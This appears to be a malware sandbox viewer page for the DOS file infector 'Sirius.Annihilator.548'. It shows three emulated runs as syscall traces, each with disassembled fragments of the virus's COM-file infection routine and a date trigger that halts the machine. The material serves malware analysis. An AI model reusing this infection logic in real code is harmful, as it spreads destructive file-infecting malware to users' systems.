Sample viewer

vx.netlux.org/Virus.DOS.Sirius.Annihilator.548

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:44:52.676415376Z	53	PC: 152de \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:44:52.677679379Z	37	PC: 152f2 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:44:52.681139942Z	26	PC: 1518b \| Set disk transfer address
2018-12-17T22:44:52.682456019Z	25	PC: 15199 \| Get default drive
2018-12-17T22:44:52.684117031Z	14	PC: 151a4 \| Set default drive (Drive = 'C')
2018-12-17T22:44:52.685954127Z	78	PC: 151d2 \| Find first file
2018-12-17T22:44:52.69167612Z	61	PC: 151e0 \| Open file (Filename = 'COMMAND.COM')
2018-12-17T22:44:52.698676391Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.700472153Z	62	PC: 15207 \| Close file
2018-12-17T22:44:52.702233526Z	79	PC: 151d2 \| Find next file
2018-12-17T22:44:52.704608472Z	14	PC: 151b0 \| Set default drive (Drive = 'A')
2018-12-17T22:44:52.705993422Z	78	PC: 151d2 \| Find first file
2018-12-17T22:44:52.711802249Z	61	PC: 151e0 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:44:52.718920569Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.720188949Z	62	PC: 15207 \| Close file
2018-12-17T22:44:52.721998084Z	79	PC: 151d2 \| Find next file
2018-12-17T22:44:52.724539853Z	61	PC: 151e0 \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:44:52.731264838Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.733450106Z	62	PC: 15207 \| Close file
2018-12-17T22:44:52.735471156Z	79	PC: 151d2 \| Find next file
2018-12-17T22:44:52.739031449Z	61	PC: 151e0 \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:44:52.745874471Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.747248196Z	62	PC: 15207 \| Close file
2018-12-17T22:44:52.748883925Z	79	PC: 151d2 \| Find next file
2018-12-17T22:44:52.75196844Z	61	PC: 151e0 \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:44:52.758288785Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.759563798Z	62	PC: 15207 \| Close file
2018-12-17T22:44:52.761777045Z	79	PC: 151d2 \| Find next file
2018-12-17T22:44:52.764173703Z	61	PC: 151e0 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:44:52.770510269Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.779227085Z	62	PC: 15207 \| Close file
2018-12-17T22:44:52.78094822Z	79	PC: 151d2 \| Find next file
2018-12-17T22:44:52.783431872Z	61	PC: 151e0 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:44:52.790247186Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.791620665Z	62	PC: 15207 \| Close file
2018-12-17T22:44:52.793427275Z	79	PC: 151d2 \| Find next file
2018-12-17T22:44:52.796389536Z	61	PC: 151e0 \| Open file (Filename = 'PAH.COM')
2018-12-17T22:44:52.803079947Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.804486252Z	62	PC: 15207 \| Close file
2018-12-17T22:44:52.807480208Z	79	PC: 151d2 \| Find next file
2018-12-17T22:44:52.809858436Z	61	PC: 151e0 \| Open file (Filename = 'TEST.COM')
2018-12-17T22:44:52.816696097Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.818667953Z	87	PC: 151f7 \| Get or set file date and time
2018-12-17T22:44:52.820122858Z	44	PC: 15217 \| Get time 0x15217: or dx, dx 0x15219: je 0x15213 0x1521b: mov word ptr ds:[bp + 0x327], dx 0x15220: mov ax, 0x4200 0x15223: call 0x152a7 0x15226: mov ah, 0x3f 0x15228: lea dx, word ptr [bp + 0x318] 0x1522c: mov cx, 3 0x1522f: int 0x21 0x15231: cmp byte ptr ds:[bp + 0x318], 0x4d 0x15237: je 0x15203 0x15239: cmp byte ptr ds:[bp + 0x318], 0x5a 0x1523f: je 0x15203 0x15241: mov ax, 0x4202 0x15244: call 0x152a7 0x15247: sub ax, 3 0x1524a: mov word ptr cs:[bp + 0x316], ax 0x1524f: lea si, word ptr [bp + 0x106] 0x15253: mov di, 0xfb90 0x15256: mov cx, 0x224
2018-12-17T22:44:52.822160164Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.82381703Z	63	PC: 15231 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:44:52.826317142Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.827769146Z	64	PC: 1526c \| Write file or device (Write 548 bytes on handle 5)
2018-12-17T22:44:52.84526954Z	66	PC: 152ad \| Move file pointer
2018-12-17T22:44:52.846701823Z	64	PC: 1527d \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:44:52.849404886Z	87	PC: 15284 \| Get or set file date and time
2018-12-17T22:44:52.851321189Z	62	PC: 15288 \| Close file
2018-12-17T22:44:52.859021697Z	42	PC: 1528c \| Get date 0x1528c: cmp dh, dl 0x1528e: jne 0x152a3 0x15290: mov ah, 0x2c 0x15292: int 0x21 0x15294: and dh, 7 0x15297: jne 0x152a3 0x15299: mov ah, 9 0x1529b: lea dx, word ptr [bp + 0x2c0] 0x1529f: int 0x21 0x152a1: cli 0x152a2: hlt 0x152a3: pop dx 0x152a4: pop cx 0x152a5: pop bx 0x152a6: ret 0x152a7: xor cx, cx 0x152a9: xor dx, dx 0x152ab: int 0x21 0x152ad: ret 0x152ae: pop word ptr cs:[bp + 0x321]
2018-12-17T22:44:52.861265242Z	26	PC: 151ba \| Set disk transfer address
2018-12-17T22:44:52.863109826Z	37	PC: 15303 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:44:52.866459958Z	9	PC: 12bb5 \| Display string (String= '')
2018-12-17T22:44:52.868732129Z	9	PC: 12bbc \| Display string (Could not find end pointer)
2018-12-17T22:44:52.87966067Z	76	PC: 12bd2 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8358,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:04:29.163974425Z	53	PC: 152de \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:04:29.170857075Z	37	PC: 152f2 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:04:29.172325057Z	26	PC: 1518b \| Set disk transfer address
2018-12-25T12:04:29.173581482Z	25	PC: 15199 \| Get default drive
2018-12-25T12:04:29.17551924Z	14	PC: 151a4 \| Set default drive (Drive = 'C')
2018-12-25T12:04:29.182088917Z	78	PC: 151d2 \| Find first file
2018-12-25T12:04:29.187967135Z	61	PC: 151e0 \| Open file (Filename = 'COMMAND.COM')
2018-12-25T12:04:29.196159179Z	66	PC: 152ad \| Move file pointer
2018-12-25T12:04:29.19877692Z	62	PC: 15207 \| Close file
2018-12-25T12:04:29.200827367Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.204077155Z	14	PC: 151b0 \| Set default drive (Drive = 'A')
2018-12-25T12:04:29.205330094Z	78	PC: 151d2 \| Find first file (See above)
2018-12-25T12:04:29.21127329Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.225360572Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.226736531Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.228487115Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.231152958Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.239043402Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.240428319Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.24217907Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.245290924Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.251652803Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.253139867Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.255535143Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.260381522Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.266683738Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.268367752Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.270049645Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.272653261Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.279647155Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.281313102Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.283280197Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.286171841Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.292806821Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.294406723Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.298588409Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.301731075Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.308229268Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.312291356Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.31396692Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.316309809Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.323605309Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.325211189Z	87	PC: 151f7 \| Get or set file date and time
2018-12-25T12:04:29.326850233Z	44	PC: 15217 \| Get time 0x15217: or dx, dx 0x15219: je 0x15213 0x1521b: mov word ptr ds:[bp + 0x327], dx 0x15220: mov ax, 0x4200 0x15223: call 0x152a7 0x15226: mov ah, 0x3f 0x15228: lea dx, word ptr [bp + 0x318] 0x1522c: mov cx, 3 0x1522f: int 0x21 0x15231: cmp byte ptr ds:[bp + 0x318], 0x4d 0x15237: je 0x15203 0x15239: cmp byte ptr ds:[bp + 0x318], 0x5a 0x1523f: je 0x15203 0x15241: mov ax, 0x4202 0x15244: call 0x152a7 0x15247: sub ax, 3 0x1524a: mov word ptr cs:[bp + 0x316], ax 0x1524f: lea si, word ptr [bp + 0x106] 0x15253: mov di, 0xfb90 0x15256: mov cx, 0x224
2018-12-25T12:04:29.329643449Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.331029603Z	63	PC: 15231 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:04:29.333396023Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.335801252Z	64	PC: 1526c \| Write file or device (Write 548 bytes on handle 5)
2018-12-25T12:04:29.349047665Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.350280995Z	64	PC: 1527d \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:04:29.35346549Z	87	PC: 15284 \| Get or set file date and time
2018-12-25T12:04:29.354888912Z	62	PC: 15288 \| Close file
2018-12-25T12:04:29.362279546Z	42	PC: 1528c \| Get date 0x1528c: cmp dh, dl 0x1528e: jne 0x152a3 0x15290: mov ah, 0x2c 0x15292: int 0x21 0x15294: and dh, 7 0x15297: jne 0x152a3 0x15299: mov ah, 9 0x1529b: lea dx, word ptr [bp + 0x2c0] 0x1529f: int 0x21 0x152a1: cli 0x152a2: hlt 0x152a3: pop dx 0x152a4: pop cx 0x152a5: pop bx 0x152a6: ret 0x152a7: xor cx, cx 0x152a9: xor dx, dx 0x152ab: int 0x21 0x152ad: ret 0x152ae: pop word ptr cs:[bp + 0x321]
2018-12-25T12:04:29.365431994Z	44	PC: 15294 \| Get time 0x15294: and dh, 7 0x15297: jne 0x152a3 0x15299: mov ah, 9 0x1529b: lea dx, word ptr [bp + 0x2c0] 0x1529f: int 0x21 0x152a1: cli 0x152a2: hlt 0x152a3: pop dx 0x152a4: pop cx 0x152a5: pop bx 0x152a6: ret 0x152a7: xor cx, cx 0x152a9: xor dx, dx 0x152ab: int 0x21 0x152ad: ret 0x152ae: pop word ptr cs:[bp + 0x321] 0x152b3: pop es 0x152b4: pop ds 0x152b5: pop si 0x152b6: pop di
2018-12-25T12:04:29.367726624Z	26	PC: 151ba \| Set disk transfer address
2018-12-25T12:04:29.369096119Z	37	PC: 15303 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:04:29.372599272Z	9	PC: 12bb5 \| Display string (String= '')
2018-12-25T12:04:29.375566876Z	9	PC: 12bbc \| Display string (Could not find end pointer)
2018-12-25T12:04:29.386863306Z	76	PC: 12bd2 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8358,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:04:29.62181207Z	53	PC: 152de \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:04:29.623636623Z	37	PC: 152f2 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:04:29.625268817Z	26	PC: 1518b \| Set disk transfer address
2018-12-25T12:04:29.626298103Z	25	PC: 15199 \| Get default drive
2018-12-25T12:04:29.628064678Z	14	PC: 151a4 \| Set default drive (Drive = 'C')
2018-12-25T12:04:29.629639973Z	78	PC: 151d2 \| Find first file
2018-12-25T12:04:29.635272872Z	61	PC: 151e0 \| Open file (Filename = 'COMMAND.COM')
2018-12-25T12:04:29.642654998Z	66	PC: 152ad \| Move file pointer
2018-12-25T12:04:29.644463183Z	62	PC: 15207 \| Close file
2018-12-25T12:04:29.646419029Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.649373833Z	14	PC: 151b0 \| Set default drive (Drive = 'A')
2018-12-25T12:04:29.650729631Z	78	PC: 151d2 \| Find first file (See above)
2018-12-25T12:04:29.656489393Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.66297268Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.664384456Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.666007775Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.668565079Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.675052726Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.676352109Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.677959303Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.685788252Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.692453183Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.693773718Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.698966349Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.701354639Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.707586524Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.710552565Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.712730611Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.71529066Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.723144249Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.724822473Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.726846547Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.730119007Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.736664721Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.738257751Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.741017104Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.74402536Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.750560471Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.752714483Z	62	PC: 15207 \| Close file (See above)
2018-12-25T12:04:29.754411924Z	79	PC: 151d2 \| Find next file (See above)
2018-12-25T12:04:29.75678342Z	61	PC: 151e0 \| Open file (See above)
2018-12-25T12:04:29.763665803Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.765073938Z	87	PC: 151f7 \| Get or set file date and time
2018-12-25T12:04:29.766386677Z	44	PC: 15217 \| Get time 0x15217: or dx, dx 0x15219: je 0x15213 0x1521b: mov word ptr ds:[bp + 0x327], dx 0x15220: mov ax, 0x4200 0x15223: call 0x152a7 0x15226: mov ah, 0x3f 0x15228: lea dx, word ptr [bp + 0x318] 0x1522c: mov cx, 3 0x1522f: int 0x21 0x15231: cmp byte ptr ds:[bp + 0x318], 0x4d 0x15237: je 0x15203 0x15239: cmp byte ptr ds:[bp + 0x318], 0x5a 0x1523f: je 0x15203 0x15241: mov ax, 0x4202 0x15244: call 0x152a7 0x15247: sub ax, 3 0x1524a: mov word ptr cs:[bp + 0x316], ax 0x1524f: lea si, word ptr [bp + 0x106] 0x15253: mov di, 0xfb90 0x15256: mov cx, 0x224
2018-12-25T12:04:29.769103771Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.770457994Z	63	PC: 15231 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:04:29.772818785Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.774459656Z	64	PC: 1526c \| Write file or device (Write 548 bytes on handle 5)
2018-12-25T12:04:29.78985946Z	66	PC: 152ad \| Move file pointer (See above)
2018-12-25T12:04:29.79129309Z	64	PC: 1527d \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:04:29.794426004Z	87	PC: 15284 \| Get or set file date and time
2018-12-25T12:04:29.796661579Z	62	PC: 15288 \| Close file
2018-12-25T12:04:29.804243594Z	42	PC: 1528c \| Get date 0x1528c: cmp dh, dl 0x1528e: jne 0x152a3 0x15290: mov ah, 0x2c 0x15292: int 0x21 0x15294: and dh, 7 0x15297: jne 0x152a3 0x15299: mov ah, 9 0x1529b: lea dx, word ptr [bp + 0x2c0] 0x1529f: int 0x21 0x152a1: cli 0x152a2: hlt 0x152a3: pop dx 0x152a4: pop cx 0x152a5: pop bx 0x152a6: ret 0x152a7: xor cx, cx 0x152a9: xor dx, dx 0x152ab: int 0x21 0x152ad: ret 0x152ae: pop word ptr cs:[bp + 0x321]
2018-12-25T12:04:29.814750048Z	26	PC: 151ba \| Set disk transfer address
2018-12-25T12:04:29.816244186Z	37	PC: 15303 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:04:29.819382196Z	9	PC: 12bb5 \| Display string (String= '')
2018-12-25T12:04:29.821904792Z	9	PC: 12bbc \| Display string (Could not find end pointer)
2018-12-25T12:04:29.83215424Z	76	PC: 12bd2 \| Terminate with return code (Return code = '0')